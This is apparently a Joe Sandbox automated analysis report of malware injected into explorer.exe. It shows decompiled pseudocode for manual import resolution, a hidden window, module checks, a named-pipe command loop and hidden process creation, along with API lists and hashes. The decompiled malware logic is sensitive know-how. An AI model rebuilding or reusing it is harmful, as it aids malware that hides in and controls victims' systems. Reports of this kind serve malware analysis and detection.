                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                  						_v36 = _t121;
                  						if(_v36 != 0) {
                  							if( *_v8 == 0) {
                  								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                  							} else {
                  								_v12 =  *_v8 + _a4;
                  							}
                  							_v28 = _v28 & 0x00000000;
                  							while( *_v12 != 0) {
                  								_v24 = _v24 & 0x00000000;
                  								_v16 = _v16 & 0x00000000;
                  								_v64 = _v64 & 0x00000000;
                  								_v20 = _v20 & 0x00000000;
                  								if(( *_v12 & _v56) == 0) {
                  									_v60 =  *_v12 + _a4;
                  									_v20 = _v60 + 2;
                  									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                  									_v16 = _v40(_v36, _v20);
                  								} else {
                  									_v24 =  *_v12;
                  									_v20 = _v24 & 0x0000ffff;
                  									_v16 = _v40(_v36, _v20);
                  								}
                  								if(_v24 != _v16) {
                  									_v44 = _v44 + 1;
                  									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                  										 *_v12 = _v16;
                  									} else {
                  										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                  									}
                  								}
                  								_v12 =  &(_v12[1]);
                  								_v28 = _v28 + 4;
                  							}
                  							_v8 = _v8 + 0x14;
                  							continue;
                  						}
                  						_t163 = 0xfffffffd;
                  						return _t163;
                  					}
                  					goto L24;
                  				}
                  				return __eax | 0xffffffff;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                  • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 200 82eda-82f50 memset call 8902d 205 82fcd-82fd4 200->205 206 82f52-82f81 CreateWindowExA 200->206 207 82fdf-82ff4 205->207 208 82fd6-82fd7 205->208 206->207 209 82f83-82f92 ShowWindow 206->209 208->207 210 82f9b 209->210 212 82fba-82fcb 210->212 212->205 214 82f9d-82fa0 212->214 214->205 215 82fa2-82fb2 214->215 215->212
                  C-Code - Quality: 96%
                  			E00082EDA(void* __eflags) {
                  				CHAR* _v12;
                  				struct HINSTANCE__* _v32;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				void _v52;
                  				char _v80;
                  				char _v144;
                  				intOrPtr _t25;
                  				intOrPtr _t32;
                  				struct HWND__* _t34;
                  				intOrPtr _t36;
                  				intOrPtr _t39;
                  				struct HWND__* _t44;
                  				intOrPtr _t47;
                  				intOrPtr _t50;
                  				void* _t51;
                  				intOrPtr _t53;
                  				intOrPtr _t56;
                  				intOrPtr _t59;
                  				struct HINSTANCE__* _t64;
                  
                  				_t25 =  *0x9e684; // 0xe7f8f0
                  				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                  				memset( &_v52, 0, 0x30);
                  				_t59 =  *0x9e688; // 0xb0000
                  				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                  				_v48 = 3;
                  				_v52 = 0x30;
                  				_v12 =  &_v144;
                  				_v44 = E00082E77;
                  				_push( &_v52);
                  				_t32 =  *0x9e694; // 0xe7fa48
                  				_v32 = _t64;
                  				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                  					L6:
                  					_t34 =  *0x9e718; // 0x20356
                  					if(_t34 != 0) {
                  						_t39 =  *0x9e694; // 0xe7fa48
                  						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                  					}
                  					L8:
                  					_t36 =  *0x9e694; // 0xe7fa48
                  					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                  					return 0;
                  				}
                  				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                  				 *0x9e718 = _t44;
                  				if(_t44 == 0) {
                  					goto L8;
                  				}
                  				ShowWindow(_t44, 0);
                  				_t47 =  *0x9e694; // 0xe7fa48
                  				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
                  				while(1) {
                  					_t50 =  *0x9e694; // 0xe7fa48
                  					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                  					if(_t51 == 0) {
                  						goto L6;
                  					}
                  					if(_t51 == 0xffffffff) {
                  						goto L6;
                  					}
                  					_t53 =  *0x9e694; // 0xe7fa48
                  					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                  					_t56 =  *0x9e694; // 0xe7fa48
                  					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                  				}
                  				goto L6;
                  			}

                  APIs
                  • memset.MSVCRT ref: 00082EF9
                  • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                  • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Window$CreateShowmemset
                  • String ID: 0
                  • API String ID: 3027179219-4108050209
                  • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                  • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                  				char _v516;
                  				char _v556;
                  				char _v564;
                  				char _v568;
                  				char _v572;
                  				char _v576;
                  				intOrPtr _v580;
                  				char _v588;
                  				signed int _v596;
                  				intOrPtr _v602;
                  				intOrPtr _v604;
                  				char _v608;
                  				CHAR* _v612;
                  				CHAR* _v616;
                  				signed int _v620;
                  				signed int _v624;
                  				signed int _v628;
                  				signed int _v632;
                  				char _v636;
                  				intOrPtr _t119;
                  				void* _t120;
                  				signed int _t122;
                  				intOrPtr _t123;
                  				CHAR* _t124;
                  				intOrPtr _t125;
                  				CHAR* _t127;
                  				WCHAR* _t130;
                  				intOrPtr _t133;
                  				intOrPtr _t137;
                  				WCHAR* _t138;
                  				intOrPtr _t142;
                  				WCHAR* _t143;
                  				CHAR* _t144;
                  				intOrPtr _t145;
                  				intOrPtr _t150;
                  				intOrPtr _t153;
                  				WCHAR* _t154;
                  				signed int _t159;
                  				WCHAR* _t160;
                  				intOrPtr _t163;
                  				intOrPtr _t165;
                  				intOrPtr _t166;
                  				intOrPtr _t170;
                  				signed int _t173;
                  				signed int _t178;
                  				intOrPtr _t182;
                  				WCHAR* _t184;
                  				char _t186;
                  				WCHAR* _t188;
                  				intOrPtr _t200;
                  				intOrPtr _t211;
                  				signed int _t215;
                  				char _t220;
                  				WCHAR* _t231;
                  				intOrPtr _t235;
                  				intOrPtr _t238;
                  				intOrPtr _t239;
                  				intOrPtr _t246;
                  				signed int _t248;
                  				WCHAR* _t249;
                  				CHAR* _t250;
                  				intOrPtr _t262;
                  				void* _t271;
                  				intOrPtr _t272;
                  				signed int _t277;
                  				void* _t278;
                  				intOrPtr _t280;
                  				signed int _t282;
                  				void* _t298;
                  				void* _t299;
                  				intOrPtr _t305;
                  				CHAR* _t326;
                  				void* _t328;
                  				WCHAR* _t329;
                  				intOrPtr _t331;
                  				WCHAR* _t333;
                  				signed int _t335;
                  				intOrPtr* _t337;
                  				void* _t338;
                  				void* _t339;
                  				void* _t353;
                  
                  				_t353 = __fp0;
                  				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                  				_t119 =  *0x9e688; // 0xb0000
                  				_v620 = _v620 & 0x00000000;
                  				_t328 = __ecx;
                  				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                  					L7:
                  					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
                  					_t14 = _t120 + 1; // 0x1
                  					E0008A86D( &_v556, _t14, _t351);
                  					_t298 = 0x64;
                  					_t122 = E0008A471( &_v556, _t298);
                  					 *0x9e748 = _t122;
                  					if(_t122 != 0) {
                  						_push(0x4e5);
                  						_t299 = 0x10;
                  						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
                  						 *0x9e680 = _t123;
                  						 *_t337 = 0x610;
                  						_t124 = E000895E1(0x9b9cc);
                  						_push(0);
                  						_push(_t124);
                  						_v612 = _t124;
                  						_t125 =  *0x9e688; // 0xb0000
                  						_t127 = E000892E5(_t125 + 0x228);
                  						_t338 = _t337 + 0xc;
                  						_v616 = _t127;
                  						E000885D5( &_v612);
                  						_t130 = E0008B269(_t127);
                  						_t246 = 3;
                  						__eflags = _t130;
                  						if(_t130 != 0) {
                  							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                  							 *_t328 = _t246;
                  						}
                  						E0008861A( &_v616, 0xfffffffe);
                  						_t133 =  *0x9e688; // 0xb0000
                  						_t22 = _t133 + 0x114; // 0xb0114
                  						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                  						_t262 =  *0x9e688; // 0xb0000
                  						_t339 = _t338 + 0x14;
                  						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                  						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                  							L17:
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							_v572 = _t328;
                  							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                  							_t137 =  *0x9e680; // 0xe7fdb0
                  							_t138 =  *(_t137 + 8);
                  							__eflags = _t138;
                  							if(_t138 != 0) {
                  								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                  							}
                  							_v620 = _v620 & 0x00000000;
                  							E0008E2C6(_t353,  &_v576); // executed
                  							_pop(_t262);
                  							_t142 =  *0x9e6b4; // 0xe7fa98
                  							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                  							__eflags = _t143;
                  							if(_t143 == 0) {
                  								E0008E2C6(_t353,  &_v588);
                  								_t235 =  *0x9e6b4; // 0xe7fa98
                  								_pop(_t262);
                  								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                  							}
                  							__eflags =  *0x9e73c;
                  							if( *0x9e73c <= 0) {
                  								goto L36;
                  							} else {
                  								_t165 =  *0x9e680; // 0xe7fdb0
                  								__eflags =  *(_t165 + 8);
                  								if( *(_t165 + 8) != 0) {
                  									_t231 =  *(_t165 + 0xc);
                  									__eflags = _t231;
                  									if(_t231 != 0) {
                  										 *_t231(_v580);
                  									}
                  								}
                  								_t166 =  *0x9e688; // 0xb0000
                  								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                  								__eflags = _t262 - _t246;
                  								if(_t262 == _t246) {
                  									goto L36;
                  								} else {
                  									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                  									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                  										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                  										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                  											E000849A5();
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											_t170 =  *0x9e684; // 0xe7f8f0
                  											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                  											_t262 = _v602;
                  											_t248 = 0x3c;
                  											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                  											_v596 = _t173;
                  											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                  											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                  											_v624 = _t178;
                  											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                  											_t182 =  *0x9e688; // 0xb0000
                  											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
                  											_t339 = _t339 + 0xc;
                  											__eflags = _t184;
                  											if(_t184 >= 0) {
                  												_t333 = E00088604(0x1000);
                  												_v616 = _t333;
                  												_pop(_t262);
                  												__eflags = _t333;
                  												if(_t333 != 0) {
                  													_t186 = E0008109A(_t262, 0x148);
                  													_t305 =  *0x9e688; // 0xb0000
                  													_v636 = _t186;
                  													_push(_t305 + 0x648);
                  													_push(0xa);
                  													_push(7);
                  													_t271 = 2;
                  													E0008902D(_t271,  &_v572);
                  													_t272 =  *0x9e688; // 0xb0000
                  													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                  													_t339 = _t339 + 0x18;
                  													_v632 = _t188;
                  													__eflags = _t188;
                  													if(_t188 != 0) {
                  														_push(_v624 % _t248 & 0x0000ffff);
                  														_push(_v628 & 0x0000ffff);
                  														_push(_v596 % _t248 & 0x0000ffff);
                  														_push(_v620 & 0x0000ffff);
                  														_push(_v632);
                  														_push( &_v572);
                  														_t200 =  *0x9e688; // 0xb0000
                  														__eflags = _t200 + 0x1020;
                  														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
                  														E000885D5( &_v636);
                  														E0008A911(_t333, 0, 0xbb8, 1); // executed
                  														E0008861A( &_v632, 0xfffffffe); // executed
                  														_t339 = _t339 + 0x44;
                  													}
                  													E0008861A( &_v616, 0xfffffffe);
                  													_pop(_t262);
                  												}
                  											}
                  										}
                  										goto L36;
                  									}
                  									__eflags = _t262 - 2;
                  									if(_t262 != 2) {
                  										goto L36;
                  									}
                  									E000849A5();
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									_t211 =  *0x9e684; // 0xe7f8f0
                  									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                  									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                  									_v628 = _t215;
                  									_t277 = 0x3c;
                  									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                  									_t249 = E00088604(0x1000);
                  									_v624 = _t249;
                  									_pop(_t278);
                  									__eflags = _t249;
                  									if(_t249 != 0) {
                  										_t220 = E000895E1(_t278, 0x32d);
                  										_t280 =  *0x9e688; // 0xb0000
                  										_push(_t280 + 0x228);
                  										_t282 = 0x3c;
                  										_v636 = _t220;
                  										_push(_v628 % _t282 & 0x0000ffff);
                  										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                  										E000885D5( &_v636);
                  										E0008A911(_t249, 0, 0xbb8, 1);
                  										E0008861A( &_v624, 0xfffffffe);
                  									}
                  									goto L41;
                  								}
                  							}
                  						} else {
                  							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                  							__eflags = _t238 - _t246;
                  							if(_t238 == _t246) {
                  								goto L17;
                  							}
                  							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                  							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                  								L36:
                  								_t144 = E000895E1(_t262, 0x610);
                  								_push(0);
                  								_push(_t144);
                  								_v616 = _t144;
                  								_t145 =  *0x9e688; // 0xb0000
                  								_t329 = E000892E5(_t145 + 0x228);
                  								_v612 = _t329;
                  								__eflags = _t329;
                  								if(_t329 != 0) {
                  									_t160 = E0008B269(_t329);
                  									__eflags = _t160;
                  									if(_t160 != 0) {
                  										_t163 =  *0x9e684; // 0xe7f8f0
                  										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                  									}
                  									E0008861A( &_v612, 0xfffffffe);
                  								}
                  								E000885D5( &_v616);
                  								_t150 =  *0x9e688; // 0xb0000
                  								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
                  								_t153 =  *0x9e688; // 0xb0000
                  								_t154 = _t153 + 0x228;
                  								__eflags = _t154;
                  								lstrcpynW(_t154,  *0x9e738, 0x105);
                  								_t331 =  *0x9e688; // 0xb0000
                  								_t117 = _t331 + 0x228; // 0xb0228
                  								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
                  								E0008861A(0x9e740, 0xfffffffe);
                  								E0008861A(0x9e738, 0xfffffffe);
                  								L41:
                  								_t159 = 0;
                  								__eflags = 0;
                  								L42:
                  								return _t159;
                  							}
                  							__eflags = _t238 - 2;
                  							if(_t238 != 2) {
                  								goto L36;
                  							}
                  							goto L17;
                  						}
                  					}
                  					L8:
                  					_t159 = _t122 | 0xffffffff;
                  					goto L42;
                  				}
                  				_t250 = E000895C7(0x6e2);
                  				_v616 = _t250;
                  				_t326 = E000895C7(0x9f5);
                  				_v612 = _t326;
                  				if(_t250 != 0 && _t326 != 0) {
                  					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                  						_v620 = 1;
                  					}
                  					E000885C2( &_v616);
                  					_t122 = E000885C2( &_v612);
                  					_t351 = _v620;
                  					if(_v620 != 0) {
                  						goto L8;
                  					}
                  				}
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                  • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                  • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: fe4587f6266c6efdfab110eb6b801ba6b71310a9b5c534e9137ca171d8ead72b
                  • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                  • Opcode Fuzzy Hash: fe4587f6266c6efdfab110eb6b801ba6b71310a9b5c534e9137ca171d8ead72b
                  • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E000832A1() {
                  				char _v8;
                  				struct _OVERLAPPED* _v12;
                  				struct _OVERLAPPED* _v16;
                  				intOrPtr* _v20;
                  				char _v24;
                  				intOrPtr _v32;
                  				signed int _v36;
                  				intOrPtr* _v40;
                  				char _v168;
                  				char _v172;
                  				intOrPtr _t41;
                  				void* _t47;
                  				char _t54;
                  				char _t61;
                  				intOrPtr _t64;
                  				void* _t65;
                  				void* _t68;
                  				void* _t70;
                  				void* _t72;
                  				void* _t76;
                  				struct _OVERLAPPED* _t82;
                  				intOrPtr* _t83;
                  				signed int _t84;
                  				signed short* _t86;
                  				intOrPtr* _t97;
                  				signed short* _t105;
                  				void* _t107;
                  				void* _t108;
                  				void* _t109;
                  				intOrPtr* _t112;
                  				struct _OVERLAPPED* _t113;
                  				char _t114;
                  				void* _t115;
                  
                  				_t113 = 0;
                  				_t82 = 0;
                  				_v8 = 0;
                  				_v12 = 0;
                  				while(1) {
                  					_v16 = _t113;
                  					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
                  						break;
                  					}
                  					_push(_t113);
                  					_push( &_v16);
                  					_t41 =  *0x9e684; // 0xe7f8f0
                  					_push(0x80000);
                  					_push( *0x9e724);
                  					_push( *0x9e674);
                  					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                  						GetLastError();
                  					} else {
                  						_t86 =  *0x9e724; // 0x2c20020
                  						_t47 = ( *_t86 & 0x0000ffff) - 1;
                  						if(_t47 == 0) {
                  							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
                  							_v40 = _t112;
                  							if(_t112 != 0) {
                  								_t114 = _v24;
                  								if(_t114 <= 1) {
                  									_t113 = 0;
                  									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
                  									_t115 = _t115 + 0x10;
                  									_v172 = _t54;
                  								} else {
                  									_v36 = _t114 - 1;
                  									_t83 = E00088604(_t114 - 1 << 2);
                  									_v32 = _t83;
                  									if(_t83 == 0) {
                  										_t113 = 0;
                  									} else {
                  										if(_t114 > 1) {
                  											_v20 = _t83;
                  											_t84 = 1;
                  											do {
                  												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
                  												_t97 = _v20;
                  												_t84 = _t84 + 1;
                  												 *_t97 = _t64;
                  												_v20 = _t97 + 4;
                  											} while (_t84 < _t114);
                  											_t83 = _v32;
                  										}
                  										_t113 = 0;
                  										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
                  										_t115 = _t115 + 0x10;
                  										_v172 = _t61;
                  										E000894B7( &_v24);
                  									}
                  									_t82 = _v12;
                  								}
                  							}
                  							_t105 =  *0x9e724; // 0x2c20020
                  							E000896CA( &_v168,  &(_t105[4]), 0x80);
                  							_push(0x84);
                  							_push( &_v172);
                  							_push(2);
                  							goto L33;
                  						} else {
                  							_t65 = _t47 - 3;
                  							if(_t65 == 0) {
                  								_push(_t113);
                  								_push(_t113);
                  								_t108 = 5;
                  								E0008C319(_t108);
                  								 *0x9e758 = 1;
                  								_t82 = 1;
                  								_v12 = 1;
                  							} else {
                  								_t68 = _t65;
                  								if(_t68 == 0) {
                  									_t70 = E0008F79F( &_v8);
                  									goto L13;
                  								} else {
                  									_t72 = _t68 - 1;
                  									if(_t72 == 0) {
                  										E0008F79F( &_v8);
                  										goto L16;
                  									} else {
                  										_t76 = _t72 - 1;
                  										if(_t76 == 0) {
                  											_t70 = E0008F7C1( &_v8);
                  											L13:
                  											if(_t70 == 0) {
                  												_push(_t113);
                  												_push(_t113);
                  												_push(0xa);
                  											} else {
                  												_push(_v8);
                  												_push(_t70);
                  												_push(5);
                  											}
                  											_pop(_t109);
                  											E0008C319(_t109);
                  										} else {
                  											if(_t76 == 1) {
                  												E0008F7C1( &_v8);
                  												L16:
                  												_push(4);
                  												_push( &_v8);
                  												_push(5);
                  												L33:
                  												_pop(_t107);
                  												E0008C319(_t107);
                  												_t115 = _t115 + 0xc;
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  					DisconnectNamedPipe( *0x9e674);
                  					if(_t82 == 0) {
                  						continue;
                  					}
                  					break;
                  				}
                  				return 0;
                  			}





































                  APIs
                  • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                  • GetLastError.KERNEL32 ref: 000832D0
                    • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(00000210), ref: 0008C35F
                  • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                  • String ID:
                  • API String ID: 2389948835-0
                  • Opcode ID: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
                  • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                  • Opcode Fuzzy Hash: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
                  • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 420 8a911-8a941 memset 421 8a94c-8a971 CreateProcessW 420->421 422 8a943-8a948 420->422 423 8a9ae 421->423 424 8a973-8a976 421->424 422->421 427 8a9b0-8a9b6 423->427 425 8a978-8a988 424->425 426 8a996-8a9a6 CloseHandle 424->426 425->426 430 8a98a-8a990 GetExitCodeProcess 425->430 429 8a9ac 426->429 429->427 430->426
                  C-Code - Quality: 65%
                  			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                  				struct _PROCESS_INFORMATION _v20;
                  				struct _STARTUPINFOW _v92;
                  				signed int _t24;
                  				intOrPtr _t32;
                  				intOrPtr _t34;
                  				int _t42;
                  				WCHAR* _t44;
                  
                  				_t42 = 0x44;
                  				memset( &_v92, 0, _t42);
                  				_v92.cb = _t42;
                  				asm("stosd");
                  				_t44 = 1;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t24 = _a16;
                  				if(_t24 != 0) {
                  					_v92.dwFlags = 1;
                  					_v92.wShowWindow = 0;
                  				}
                  				asm("sbb eax, eax");
                  				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                  					_t44 = 0;
                  				} else {
                  					if(_a8 != 0) {
                  						_push(_a12);
                  						_t34 =  *0x9e684; // 0xe7f8f0
                  						_push(_v20.hProcess);
                  						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                  							GetExitCodeProcess(_v20.hProcess, _a8);
                  						}
                  					}
                  					CloseHandle(_v20.hThread);
                  					_t32 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                  				}
                  				return _t44;
                  			}











                  APIs
                  • memset.MSVCRT ref: 0008A925
                  • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0008A990
                  • CloseHandle.KERNELBASE(?), ref: 0008A99E
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Process$CloseCodeCreateExitHandlememset
                  • String ID:
                  • API String ID: 2668540068-0
                  • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                  • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 431 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 434 8b07c-8b07e 431->434 435 8b0ab-8b0dd call 8c392 lstrcpynW 434->435 436 8b080-8b094 call 8bb8d 434->436 436->435 440 8b096-8b0a7 436->440 440->435
                  C-Code - Quality: 87%
                  			E0008B012(void* __ecx, WCHAR* __edx) {
                  				int _v8;
                  				void _v528;
                  				char _v1046;
                  				void _v1048;
                  				intOrPtr _t21;
                  				intOrPtr* _t26;
                  				void* _t27;
                  				intOrPtr _t33;
                  				intOrPtr _t36;
                  				void* _t39;
                  				intOrPtr _t40;
                  				WCHAR* _t47;
                  				void* _t49;
                  
                  				_t39 = __ecx;
                  				_v8 = 0x104;
                  				_t47 = __edx;
                  				memset( &_v1048, 0, 0x208);
                  				memset( &_v528, 0, 0x208);
                  				_t21 =  *0x9e698; // 0xe7fbc8
                  				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                  				_t49 = E0008B946(_t39);
                  				_t26 =  *0x9e6b8; // 0xe7fbd8
                  				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                  				if(_t27 == 0) {
                  					_t33 =  *0x9e688; // 0xb0000
                  					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                  						_t36 =  *0x9e698; // 0xe7fbc8
                  						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                  					}
                  				}
                  				_t40 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                  				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
                  				return 1;
                  			}

















                  APIs
                  • memset.MSVCRT ref: 0008B037
                  • memset.MSVCRT ref: 0008B045
                  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
